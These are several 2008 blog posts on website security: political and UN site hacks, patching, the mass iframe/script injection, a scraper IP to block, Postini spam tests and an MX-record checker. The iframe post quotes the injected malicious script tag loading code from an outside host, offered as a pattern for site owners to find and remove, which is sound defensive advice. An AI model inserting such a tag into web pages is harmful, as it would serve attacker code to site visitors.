Friday, April 25, 2008

Obama and Clinton Sites Hacked - Among Others

Obama and Clinton had their web sites hacked according to netcraft report: Obama Clinton site hacks Hmm. Obama's primary site was hacked. Clinton's was not. Clinton is raising a lot of money suddenly. Coincidence?

Check your web site security. It matters.

Oh and by the way the UN site was hacked too (among others):
UN Web site Hacked

Patch or Be Hacked in 30 Seconds

This is why you should install patches sooner than later:

Microsoft Vulnerabilities Hacked in 30 seconds

Iframe Hack

Here's how to check if your site is one of the many with the latest iframe hack:

Search all your web pages for code like this and remove it:


<script src=http://www.nihaorr1.com/1.js>


More info:
Iframe hack

Keyword Spy

These people are probably dissecting your web content to copy and put onto their own web sites.

66.34.204.26

The referrer is always something like:
http://www.keywordspy.com/...

You may want to block them.

Contact the network and ask them to stop.

C I Host CIHOST4 (NET-66-34-0-0-1)
66.34.0.0 - 66.34.255.255
CIHS PROPAGATION4 (NET-66-34-0-0-2)
66.34.0.0 - 66.34.255.254


If this is not illegal, it should be.

Friday, April 18, 2008

Bots Scanning Google Hacking Tons of Web Sites

See my post about IE6 scanning Google links in a recent post:

http://www.networkworld.com/news/2008/041708-sans-solves-mystery-of-mass.html?Inform=nl&nlhtsec=rn_041808&nladname=041808securityal

The results of scans and hacking was reported back to a computer in China.

Update your software!

Friday, April 11, 2008

Postini - Spam is Down

Using Postini spam has decreased from about 900 messages per day to 19 yesterday. 19 is still too many but it's getting better...

Tuesday, April 08, 2008

Postini Test

Testing out Postini and gave them a day to catch up. I've been sending all my spam and full mail headers to spam@postini.com as recommended on the contact page of their web site. Here are the statistics so far.

Today Postini caught about 33 spam messages.

I sent them about 61 messages that their spam filters did not catch.

That being said I just recently added some spam ridden aliases to their spam configuration (which is pretty decent though it could be a bit more user friendly and easy to find what you are looking for...)

Also I found a bunch of spam -- in my SENT items - which were sent to me on the Intermedia mail system which I think is based on Horde. Some of those may have been pretty old.

As I write this I just logged in to find two more spam messages in my in box.

We'll see how they do tomorrow...

Sunday, April 06, 2008

Email Server Check

Here's a cool site which helps you test your MX records to first of all find out what they are, and then test diagnostics such as if your mail server is an open relay - very bad - on blacklists - also not good, or not performing well.

http://www.mxtoolbox.com/

For instance this site shows that intermedia.net has an smtp server that is potentially an open relay and responding very slowly.

Two electricmail.com servers return slowly and the second one has a reverse dns problem.

Check your mail servers by putting in your domain name, then run the diagnostic and blacklist test and ask your mail providers to fix any problems they find.